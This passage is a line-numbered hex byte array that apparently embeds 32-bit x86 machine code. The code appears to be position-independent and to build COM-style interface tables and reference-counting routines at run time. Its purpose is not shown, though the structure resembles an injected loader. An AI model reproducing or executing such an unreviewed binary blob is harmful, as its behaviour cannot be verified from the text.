1380 0x00, 0x89, 0x45, 0xf0, 0x90, 0x8b, 0x5d, 0xfc, 0xc9, 0xc3, 0x55, 0x89,
1381 0xe5, 0x83, 0xec, 0x18, 0x8b, 0x45, 0x0c, 0x89, 0x45, 0xf4, 0xe8, 0x61,
1382 0x10, 0x00, 0x00, 0xba, 0xec, 0x51, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40,
1383 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0xf4, 0x8b, 0x00, 0x89, 0x10,
1384 0xe8, 0x47, 0x10, 0x00, 0x00, 0xba, 0xcf, 0x52, 0x40, 0x00, 0xb9, 0x14,
1385 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0xf4, 0x8b, 0x00,
1386 0x89, 0x50, 0x04, 0xe8, 0x2c, 0x10, 0x00, 0x00, 0xba, 0xfa, 0x52, 0x40,
1387 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45,
1388 0xf4, 0x8b, 0x00, 0x89, 0x50, 0x08, 0xe8, 0x11, 0x10, 0x00, 0x00, 0xba,
1389 0x43, 0x54, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01,
1390 0xc2, 0x8b, 0x45, 0xf4, 0x8b, 0x00, 0x89, 0x50, 0x0c, 0xe8, 0xf6, 0x0f,
1391 0x00, 0x00, 0xba, 0x2d, 0x53, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00,
1392 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0xf4, 0x8b, 0x00, 0x89, 0x50, 0x10,
1393 0xe8, 0xdb, 0x0f, 0x00, 0x00, 0xba, 0x68, 0x54, 0x40, 0x00, 0xb9, 0x14,
1394 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0xf4, 0x8b, 0x00,
1395 0x89, 0x50, 0x14, 0xe8, 0xc0, 0x0f, 0x00, 0x00, 0xba, 0x74, 0x54, 0x40,
1396 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45,
1397 0xf4, 0x8b, 0x00, 0x89, 0x50, 0x18, 0xe8, 0xa5, 0x0f, 0x00, 0x00, 0xba,
1398 0x80, 0x54, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01,
1399 0xc2, 0x8b, 0x45, 0xf4, 0x8b, 0x00, 0x89, 0x50, 0x1c, 0xe8, 0x8a, 0x0f,
1400 0x00, 0x00, 0xba, 0xb6, 0x53, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00,
1401 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0xf4, 0x8b, 0x00, 0x89, 0x50, 0x20,
1402 0xe8, 0x6f, 0x0f, 0x00, 0x00, 0xba, 0x8c, 0x54, 0x40, 0x00, 0xb9, 0x14,
1403 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0xf4, 0x8b, 0x00,
1404 0x89, 0x50, 0x24, 0xe8, 0x54, 0x0f, 0x00, 0x00, 0xba, 0x98, 0x54, 0x40,
1405 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45,
1406 0xf4, 0x8b, 0x00, 0x89, 0x50, 0x28, 0x8b, 0x45, 0xf4, 0xc7, 0x40, 0x04,
1407 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xf4, 0x8b, 0x55, 0x08, 0x89, 0x50,
1408 0x2c, 0x90, 0xc9, 0xc3, 0x55, 0x89, 0xe5, 0x83, 0xec, 0x28, 0x8b, 0x45,
1409 0x08, 0x89, 0x45, 0xf4, 0x83, 0x7d, 0x10, 0x00, 0x75, 0x0a, 0xb8, 0x03,
1410 0x40, 0x00, 0x80, 0xe9, 0xc3, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xf4, 0x8b,
1411 0x40, 0x2c, 0x8d, 0x90, 0x04, 0x08, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x08,
1412 0x10, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x0c, 0x89, 0x44, 0x24, 0x04, 0x89,
1413 0x14, 0x24, 0xe8, 0x68, 0x12, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x27, 0x8b,
1414 0x45, 0xf4, 0x8b, 0x40, 0x2c, 0x8d, 0x90, 0xb4, 0x08, 0x00, 0x00, 0xc7,
1415 0x44, 0x24, 0x08, 0x10, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x0c, 0x89, 0x44,
1416 0x24, 0x04, 0x89, 0x14, 0x24, 0xe8, 0x41, 0x12, 0x00, 0x00, 0x85, 0xc0,
1417 0x75, 0x1d, 0x8b, 0x45, 0x10, 0x8b, 0x55, 0x08, 0x89, 0x10, 0x8b, 0x45,
1418 0x08, 0x89, 0x04, 0x24, 0xe8, 0x66, 0x00, 0x00, 0x00, 0x83, 0xec, 0x04,
1419 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x58, 0x8b, 0x45, 0xf4, 0x8b, 0x40,
1420 0x2c, 0x8d, 0x90, 0xc4, 0x08, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x08, 0x10,
1421 0x00, 0x00, 0x00, 0x8b, 0x45, 0x0c, 0x89, 0x44, 0x24, 0x04, 0x89, 0x14,
1422 0x24, 0xe8, 0xfd, 0x11, 0x00, 0x00, 0x85, 0xc0, 0x75, 0x23, 0x8b, 0x45,
1423 0xf4, 0x8d, 0x50, 0x08, 0x8b, 0x45, 0x10, 0x89, 0x10, 0x8b, 0x45, 0xf4,
1424 0x83, 0xc0, 0x08, 0x89, 0x04, 0x24, 0xe8, 0x23, 0x03, 0x00, 0x00, 0x83,
1425 0xec, 0x04, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x0e, 0x8b, 0x45, 0x10,
1426 0xc7, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb8, 0x02, 0x40, 0x00, 0x80, 0xc9,
1427 0xc2, 0x0c, 0x00, 0x55, 0x89, 0xe5, 0x83, 0xec, 0x10, 0x8b, 0x45, 0x08,
1428 0x89, 0x45, 0xfc, 0x8b, 0x45, 0xfc, 0x83, 0xc0, 0x04, 0x89, 0x45, 0xf8,
1429 0x8b, 0x45, 0xf8, 0xba, 0x01, 0x00, 0x00, 0x00, 0xf0, 0x0f, 0xc1, 0x10,
1430 0x8b, 0x45, 0xfc, 0x8b, 0x40, 0x04, 0xc9, 0xc2, 0x04, 0x00, 0x55, 0x89,
1431 0xe5, 0x83, 0xec, 0x10, 0x8b, 0x45, 0x08, 0x89, 0x45, 0xfc, 0x8b, 0x45,
1432 0xfc, 0x83, 0xc0, 0x04, 0x89, 0x45, 0xf4, 0x8b, 0x55, 0xf4, 0xb8, 0x01,
1433 0x00, 0x00, 0x00, 0xf7, 0xd8, 0x89, 0xc1, 0x89, 0xc8, 0xf0, 0x0f, 0xc1,
1434 0x02, 0x01, 0xc8, 0x89, 0x45, 0xf8, 0x8b, 0x45, 0xf8, 0xc9, 0xc2, 0x04,
1435 0x00, 0x55, 0x89, 0xe5, 0x83, 0xec, 0x28, 0x8b, 0x45, 0x08, 0x89, 0x45,
1436 0xf4, 0x8b, 0x45, 0x10, 0x83, 0xe0, 0x02, 0x85, 0xc0, 0x74, 0x31, 0x83,
1437 0x7d, 0x18, 0x00, 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, 0x62,
1438 0x8b, 0x45, 0xf4, 0x8b, 0x40, 0x1c, 0x8b, 0x00, 0x8b, 0x40, 0x04, 0x8b,
1439 0x55, 0xf4, 0x8b, 0x52, 0x1c, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec,
1440 0x04, 0x8b, 0x45, 0xf4, 0x8b, 0x50, 0x1c, 0x8b, 0x45, 0x18, 0x89, 0x10,
1441 0x8b, 0x45, 0x10, 0x83, 0xe0, 0x01, 0x85, 0xc0, 0x74, 0x2f, 0x83, 0x7d,
1442 0x14, 0x00, 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, 0x27, 0x8b,
1443 0x45, 0xf4, 0x8b, 0x40, 0x14, 0x8b, 0x40, 0x04, 0x8b, 0x55, 0xf4, 0x83,
1444 0xc2, 0x14, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04, 0x8b, 0x45,
1445 0xf4, 0x8d, 0x50, 0x14, 0x8b, 0x45, 0x14, 0x89, 0x10, 0xb8, 0x00, 0x00,
1446 0x00, 0x00, 0xc9, 0xc2, 0x14, 0x00, 0x55, 0x89, 0xe5, 0x83, 0xec, 0x48,
1447 0xc7, 0x45, 0xd0, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xcc, 0x00, 0x00,
1448 0x00, 0x00, 0xc7, 0x45, 0xc8, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24,
1449 0x08, 0x20, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x04, 0x00, 0x00, 0x00,
1450 0x00, 0x8d, 0x45, 0xd4, 0x89, 0x04, 0x24, 0xe8, 0x40, 0x10, 0x00, 0x00,
1451 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x8b, 0x40, 0x0c, 0x8d, 0x55, 0xd4, 0x89,
1452 0x54, 0x24, 0x04, 0x8b, 0x55, 0x0c, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83,
1453 0xec, 0x08, 0x89, 0x45, 0xf4, 0x83, 0x7d, 0xf4, 0x00, 0x75, 0x2b, 0x8b,
1454 0x45, 0x0c, 0x8b, 0x00, 0x8b, 0x40, 0x10, 0x8d, 0x55, 0xc8, 0x89, 0x54,
1455 0x24, 0x0c, 0x8d, 0x55, 0xcc, 0x89, 0x54, 0x24, 0x08, 0x8d, 0x55, 0xd0,
1456 0x89, 0x54, 0x24, 0x04, 0x8b, 0x55, 0x0c, 0x89, 0x14, 0x24, 0xff, 0xd0,
1457 0x83, 0xec, 0x10, 0x89, 0x45, 0xf4, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xc9,
1458 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0x83, 0xec, 0x18, 0x8b, 0x45, 0x08,
1459 0x89, 0x45, 0xf4, 0x8b, 0x45, 0xf4, 0x8b, 0x40, 0x2c, 0x8b, 0x40, 0x4c,
1460 0xff, 0xd0, 0x8b, 0x55, 0x0c, 0x89, 0x02, 0xb8, 0x00, 0x00, 0x00, 0x00,
1461 0xc9, 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x00, 0x00, 0x00, 0x00,
1462 0x5d, 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x00, 0x00, 0x00, 0x00,
1463 0x5d, 0xc2, 0x0c, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x00, 0x00, 0x00, 0x00,
1464 0x5d, 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x00, 0x00, 0x00, 0x00,
1465 0x5d, 0xc2, 0x04, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x00, 0x00, 0x00, 0x00,
1466 0x5d, 0xc2, 0x04, 0x00, 0x55, 0x89, 0xe5, 0x83, 0xec, 0x08, 0xe8, 0x65,
1467 0x0c, 0x00, 0x00, 0xba, 0x46, 0x55, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40,
1468 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89, 0x10,
1469 0xe8, 0x4b, 0x0c, 0x00, 0x00, 0xba, 0xd6, 0x55, 0x40, 0x00, 0xb9, 0x14,
1470 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c, 0x8b, 0x00,
1471 0x89, 0x50, 0x04, 0xe8, 0x30, 0x0c, 0x00, 0x00, 0xba, 0xfb, 0x55, 0x40,
1472 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45,
1473 0x0c, 0x8b, 0x00, 0x89, 0x50, 0x08, 0xe8, 0x15, 0x0c, 0x00, 0x00, 0xba,
1474 0x28, 0x56, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01,
1475 0xc2, 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89, 0x50, 0x0c, 0xe8, 0xfa, 0x0b,
1476 0x00, 0x00, 0xba, 0x34, 0x56, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00,
1477 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89, 0x50, 0x10,
1478 0x8b, 0x45, 0x0c, 0xc7, 0x40, 0x04, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45,
1479 0x0c, 0x8b, 0x55, 0x08, 0x89, 0x50, 0x08, 0x90, 0xc9, 0xc3, 0x55, 0x89,
1480 0xe5, 0x83, 0xec, 0x18, 0x83, 0x7d, 0x10, 0x00, 0x75, 0x07, 0xb8, 0x03,
1481 0x40, 0x00, 0x80, 0xeb, 0x79, 0x8b, 0x45, 0x08, 0x8b, 0x40, 0x08, 0x8d,
1482 0x90, 0x04, 0x08, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x08, 0x10, 0x00, 0x00,
1483 0x00, 0x8b, 0x45, 0x0c, 0x89, 0x44, 0x24, 0x04, 0x89, 0x14, 0x24, 0xe8,
1484 0x17, 0x0f, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x27, 0x8b, 0x45, 0x08, 0x8b,
1485 0x40, 0x08, 0x8d, 0x90, 0xc4, 0x08, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x08,
1486 0x10, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x0c, 0x89, 0x44, 0x24, 0x04, 0x89,
1487 0x14, 0x24, 0xe8, 0xf0, 0x0e, 0x00, 0x00, 0x85, 0xc0, 0x75, 0x1d, 0x8b,
1488 0x45, 0x10, 0x8b, 0x55, 0x08, 0x89, 0x10, 0x8b, 0x45, 0x08, 0x89, 0x04,
1489 0x24, 0xe8, 0x1c, 0x00, 0x00, 0x00, 0x83, 0xec, 0x04, 0xb8, 0x00, 0x00,
1490 0x00, 0x00, 0xeb, 0x0e, 0x8b, 0x45, 0x10, 0xc7, 0x00, 0x00, 0x00, 0x00,
1491 0x00, 0xb8, 0x02, 0x40, 0x00, 0x80, 0xc9, 0xc2, 0x0c, 0x00, 0x55, 0x89,
1492 0xe5, 0x83, 0xec, 0x10, 0x8b, 0x45, 0x08, 0x83, 0xc0, 0x04, 0x89, 0x45,
1493 0xfc, 0x8b, 0x45, 0xfc, 0xba, 0x01, 0x00, 0x00, 0x00, 0xf0, 0x0f, 0xc1,
1494 0x10, 0x8b, 0x45, 0x08, 0x8b, 0x40, 0x04, 0xc9, 0xc2, 0x04, 0x00, 0x55,
1495 0x89, 0xe5, 0x83, 0xec, 0x10, 0x8b, 0x45, 0x08, 0x83, 0xc0, 0x04, 0x89,
1496 0x45, 0xf8, 0x8b, 0x55, 0xf8, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xf7, 0xd8,
1497 0x89, 0xc1, 0x89, 0xc8, 0xf0, 0x0f, 0xc1, 0x02, 0x01, 0xc8, 0x89, 0x45,
1498 0xfc, 0x8b, 0x45, 0xfc, 0xc9, 0xc2, 0x04, 0x00, 0x55, 0x89, 0xe5, 0xb8,
1499 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0xb8,
1500 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0x53,
1501 0x81, 0xec, 0x24, 0x02, 0x00, 0x00, 0xe8, 0xc5, 0x0a, 0x00, 0x00, 0xba,
1502 0x0d, 0x5a, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01,
1503 0xc2, 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89, 0x10, 0xe8, 0xab, 0x0a, 0x00,
1504 0x00, 0xba, 0xb9, 0x5a, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29,
1505 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89, 0x50, 0x04, 0xe8,
1506 0x90, 0x0a, 0x00, 0x00, 0xba, 0xde, 0x5a, 0x40, 0x00, 0xb9, 0x14, 0x61,
1507 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89,
1508 0x50, 0x08, 0xe8, 0x75, 0x0a, 0x00, 0x00, 0xba, 0x0b, 0x5b, 0x40, 0x00,
1509 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c,
1510 0x8b, 0x00, 0x89, 0x50, 0x0c, 0xe8, 0x5a, 0x0a, 0x00, 0x00, 0xba, 0x2d,
1511 0x5b, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2,
1512 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89, 0x50, 0x10, 0xe8, 0x3f, 0x0a, 0x00,
1513 0x00, 0xba, 0x6d, 0x5b, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29,
1514 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89, 0x50, 0x14, 0xe8,
1515 0x24, 0x0a, 0x00, 0x00, 0xba, 0xa5, 0x5b, 0x40, 0x00, 0xb9, 0x14, 0x61,
1516 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89,
1517 0x50, 0x18, 0xe8, 0x09, 0x0a, 0x00, 0x00, 0xba, 0x0b, 0x5c, 0x40, 0x00,
1518 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c,
1519 0x8b, 0x00, 0x89, 0x50, 0x1c, 0xe8, 0xee, 0x09, 0x00, 0x00, 0xba, 0x17,
1520 0x5c, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2,
1521 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89, 0x50, 0x20, 0xe8, 0xd3, 0x09, 0x00,
1522 0x00, 0xba, 0x23, 0x5c, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29,
1523 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89, 0x50, 0x24, 0xe8,
1524 0xb8, 0x09, 0x00, 0x00, 0xba, 0x2f, 0x5c, 0x40, 0x00, 0xb9, 0x14, 0x61,
1525 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89,
1526 0x50, 0x28, 0xe8, 0x9d, 0x09, 0x00, 0x00, 0xba, 0x3b, 0x5c, 0x40, 0x00,
1527 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c,
1528 0x8b, 0x00, 0x89, 0x50, 0x2c, 0xe8, 0x82, 0x09, 0x00, 0x00, 0xba, 0x47,
1529 0x5c, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2,
1530 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89, 0x50, 0x30, 0xe8, 0x67, 0x09, 0x00,
1531 0x00, 0xba, 0x5d, 0x5c, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29,
1532 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89, 0x50, 0x34, 0xe8,
1533 0x4c, 0x09, 0x00, 0x00, 0xba, 0x9d, 0x5c, 0x40, 0x00, 0xb9, 0x14, 0x61,
1534 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89,
1535 0x50, 0x38, 0xe8, 0x31, 0x09, 0x00, 0x00, 0xba, 0xa9, 0x5c, 0x40, 0x00,
1536 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c,
1537 0x8b, 0x00, 0x89, 0x50, 0x3c, 0xe8, 0x16, 0x09, 0x00, 0x00, 0xba, 0xb5,
1538 0x5c, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2,
1539 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89, 0x50, 0x40, 0xe8, 0xfb, 0x08, 0x00,
1540 0x00, 0xba, 0xc1, 0x5c, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29,
1541 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89, 0x50, 0x44, 0xe8,
1542 0xe0, 0x08, 0x00, 0x00, 0xba, 0xcd, 0x5c, 0x40, 0x00, 0xb9, 0x14, 0x61,
1543 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89,
1544 0x50, 0x48, 0xe8, 0xc5, 0x08, 0x00, 0x00, 0xba, 0xd9, 0x5c, 0x40, 0x00,
1545 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c,
1546 0x8b, 0x00, 0x89, 0x50, 0x4c, 0xe8, 0xaa, 0x08, 0x00, 0x00, 0xba, 0xe5,
1547 0x5c, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2,
1548 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89, 0x50, 0x50, 0xe8, 0x8f, 0x08, 0x00,
1549 0x00, 0xba, 0xf1, 0x5c, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29,
1550 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89, 0x50, 0x54, 0xe8,
1551 0x74, 0x08, 0x00, 0x00, 0xba, 0xfd, 0x5c, 0x40, 0x00, 0xb9, 0x14, 0x61,
1552 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89,
1553 0x50, 0x58, 0xe8, 0x59, 0x08, 0x00, 0x00, 0xba, 0x09, 0x5d, 0x40, 0x00,
1554 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c,
1555 0x8b, 0x00, 0x89, 0x50, 0x5c, 0xe8, 0x3e, 0x08, 0x00, 0x00, 0xba, 0x15,
1556 0x5d, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2,
1557 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89, 0x50, 0x60, 0xe8, 0x23, 0x08, 0x00,
1558 0x00, 0xba, 0x21, 0x5d, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29,
1559 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89, 0x50, 0x64, 0xe8,
1560 0x08, 0x08, 0x00, 0x00, 0xba, 0x44, 0x5d, 0x40, 0x00, 0xb9, 0x14, 0x61,
1561 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89,
1562 0x50, 0x68, 0xe8, 0xed, 0x07, 0x00, 0x00, 0xba, 0x50, 0x5d, 0x40, 0x00,
1563 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c,
1564 0x8b, 0x00, 0x89, 0x50, 0x6c, 0xe8, 0xd2, 0x07, 0x00, 0x00, 0xba, 0x5c,
1565 0x5d, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2,
1566 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89, 0x50, 0x70, 0xe8, 0xb7, 0x07, 0x00,
1567 0x00, 0xba, 0x68, 0x5d, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29,
1568 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89, 0x50, 0x74, 0x8b,
1569 0x45, 0x0c, 0xc7, 0x40, 0x10, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x0c,
1570 0x8b, 0x55, 0x08, 0x89, 0x50, 0x14, 0x8b, 0x45, 0x08, 0x8d, 0x90, 0xed,
1571 0x05, 0x00, 0x00, 0x8d, 0x85, 0xf2, 0xfd, 0xff, 0xff, 0x89, 0x44, 0x24,
1572 0x08, 0x89, 0x54, 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8,
1573 0x73, 0xc0, 0xff, 0xff, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0xa4, 0x00, 0x00,
1574 0x00, 0x8b, 0x55, 0x0c, 0x83, 0xc2, 0x04, 0x89, 0x54, 0x24, 0x04, 0x8d,
1575 0x95, 0xf2, 0xfd, 0xff, 0xff, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec,
1576 0x08, 0x89, 0x45, 0xf4, 0x83, 0x7d, 0xf4, 0x00, 0x75, 0x33, 0x8b, 0x45,
1577 0x0c, 0x8b, 0x40, 0x04, 0x8b, 0x00, 0x8b, 0x40, 0x18, 0x8b, 0x55, 0x0c,
1578 0x8d, 0x5a, 0x08, 0x8b, 0x55, 0x08, 0x8d, 0x8a, 0x94, 0x08, 0x00, 0x00,
1579 0x8b, 0x55, 0x0c, 0x8b, 0x52, 0x04, 0x89, 0x5c, 0x24, 0x08, 0x89, 0x4c,
1580 0x24, 0x04, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x0c, 0x89, 0x45,
1581 0xf4, 0x8b, 0x45, 0xf4, 0x8b, 0x5d, 0xfc, 0xc9, 0xc3, 0x55, 0x89, 0xe5,
1582 0x83, 0xec, 0x18, 0x83, 0x7d, 0x10, 0x00, 0x75, 0x0a, 0xb8, 0x03, 0x40,
1583 0x00, 0x80, 0xe9, 0x92, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x40,
1584 0x14, 0x8d, 0x90, 0x04, 0x08, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x08, 0x10,
1585 0x00, 0x00, 0x00, 0x8b, 0x45, 0x0c, 0x89, 0x44, 0x24, 0x04, 0x89, 0x14,
1586 0x24, 0xe8, 0x4d, 0x0a, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x4e, 0x8b, 0x45,
1587 0x08, 0x8b, 0x40, 0x14, 0x8d, 0x90, 0x14, 0x08, 0x00, 0x00, 0xc7, 0x44,
1588 0x24, 0x08, 0x10, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x0c, 0x89, 0x44, 0x24,
1589 0x04, 0x89, 0x14, 0x24, 0xe8, 0x26, 0x0a, 0x00, 0x00, 0x85, 0xc0, 0x74,
1590 0x27, 0x8b, 0x45, 0x08, 0x8b, 0x40, 0x14, 0x8d, 0x90, 0x94, 0x08, 0x00,
1591 0x00, 0xc7, 0x44, 0x24, 0x08, 0x10, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x0c,
1592 0x89, 0x44, 0x24, 0x04, 0x89, 0x14, 0x24, 0xe8, 0xff, 0x09, 0x00, 0x00,
1593 0x85, 0xc0, 0x75, 0x0f, 0x8b, 0x45, 0x10, 0x8b, 0x55, 0x08, 0x89, 0x10,
1594 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x0e, 0x8b, 0x45, 0x10, 0xc7, 0x00,
1595 0x00, 0x00, 0x00, 0x00, 0xb8, 0x02, 0x40, 0x00, 0x80, 0xc9, 0xc2, 0x0c,
1596 0x00, 0x55, 0x89, 0xe5, 0x83, 0xec, 0x10, 0x8b, 0x45, 0x08, 0x83, 0xc0,
1597 0x10, 0x89, 0x45, 0xfc, 0x8b, 0x45, 0xfc, 0xba, 0x01, 0x00, 0x00, 0x00,
1598 0xf0, 0x0f, 0xc1, 0x10, 0x8b, 0x45, 0x08, 0x8b, 0x40, 0x10, 0xc9, 0xc2,
1599 0x04, 0x00, 0x55, 0x89, 0xe5, 0x83, 0xec, 0x10, 0x8b, 0x45, 0x08, 0x83,
1600 0xc0, 0x10, 0x89, 0x45, 0xf8, 0x8b, 0x55, 0xf8, 0xb8, 0x01, 0x00, 0x00,
1601 0x00, 0xf7, 0xd8, 0x89, 0xc1, 0x89, 0xc8, 0xf0, 0x0f, 0xc1, 0x02, 0x01,
1602 0xc8, 0x89, 0x45, 0xfc, 0x8b, 0x45, 0xfc, 0xc9, 0xc2, 0x04, 0x00, 0x55,
1603 0x89, 0xe5, 0x83, 0x7d, 0x0c, 0x00, 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00,
